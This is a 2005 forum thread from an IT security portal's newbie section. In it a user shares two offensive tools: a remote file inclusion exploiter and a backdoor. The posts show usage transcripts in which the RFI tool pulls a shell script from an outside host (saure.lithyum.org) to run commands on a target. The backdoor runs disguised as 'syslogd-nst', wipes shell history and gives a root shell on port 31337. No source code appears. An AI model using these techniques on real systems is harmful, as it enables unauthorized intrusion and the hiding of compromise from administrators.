Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 86
Members: 0
Total: 86
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> 2 stupid programs but useful
Post new topicReply to topic View previous topic :: View next topic
2 stupid programs but useful
PostPosted: Sat Apr 16, 2005 2:59 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




jajaj ok i know most of u r going to say that is lame mmm but well trying coding one...
Peace


NST-RFITool
Code:
/*
Name: NST-RFITool v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN <hck_zatan@hotmail.com>
Date: 02/04/05
Description: RFI Tool as well. Remote :) With shell :) =)

root@NeoSecurity:/home/hackzatan# ./NST-RFITool
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
[+] Usage: ./NST-RFITool <Host> <Archivo_Rfi> <cmd> <Shell_or_Command>
[+] example: ./NST-RFITool localhost /index.php "?&cmd=" "http://host.com/shell.gif"
[+] http://localhost/index.php?&cmd=id
['] Or you could use
[+] http://localhost/index.php?&cmd=http://host.com/shell.gif
root@NeoSecurity:/home/hackzatan# ./NST-RFITool localhost /index.php "?&cmd=" "http://saure.lithyum.org/0/cmd.gif?&cmd="
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
Starting NST-Shell...
(ctrl+c to exit)
Connecting localhost:80

NShell> id;uname -a;uptime;ls

uid=99(nobody) gid=98(nobody) groups=98(nobody)
Linux NeoSecurity 2.4.29 #6 Thu Jan 20 16:30:37 PST 2005 i686 unknown unknown GNU/Linux
21:40:51 up 11:33, 1 user, load average: 0.00, 0.02, 0.00
apache_pb.gif
index.php
END
NShell>
root@NeoSecurity:/home/hackzatan#

Under GPL
I accept no responsibilty for any damage caused by it.
Additons and fixes always welcome.
*/



NST-Backdoor
Code:
/*
Name: NST-Backdoor v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN
Date: 31/03/05 17:51
Description: Backdoor!!

root@NeoSecurity:/home/hackzatan# pico NST-Backdoor.c
root@NeoSecurity:/home/hackzatan# gcc NST-Backdoor.c -o NST-Backdoor
root@NeoSecurity:/home/hackzatan# ./NST-Backdooor
[+] NST-Backdoor v0.1 by HaCkZaTaN
[+] NeoSecurity
[*] Usage: ./NST-Backdoor <port>
root@NeoSecurity:/home/hackzatan# ./NST-Backdoor 31337
[+] NST-Backdoor v0.1 by HaCkZaTaN
[*] Connecting...
[*] Spawning Shell on port 31337. PID is 1887.
root@NeoSecurity:/home/hackzatan# ps -aux | grep syslogd-nst
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1888 0.0 0.5 1256 344 pts/0 S 18:46 0:00 syslogd-nst oor 31337
root@NeoSecurity:/home/hackzatan# telnet localhost 31337
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
NST-Backdoor v0.1 - Have a lot of fun..
"export TERM=xterm; unset HISTFILE; unset SAVEHIST"sh-3.00#
sh-3.00# sh-3.00# export TERM=xterm; unset HISTFILE; unset SAVEHIST
sh-3.00# sh-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-3.00# sh-3.00#

*/
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:40 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




where was the code ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 5:50 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




There is a link You dont see iit Smile

Well i post it again is in .rar

NST-RFITool

NST-Backdoor

Peace
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 6:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




sorry bout that,
coz i just see you put a detailed how to use it in "[code]" place ,n it would be great if u put the real code in "[code]" place, so we could see a source code.

but its oke

peace too

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
2 stupid programs but useful
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds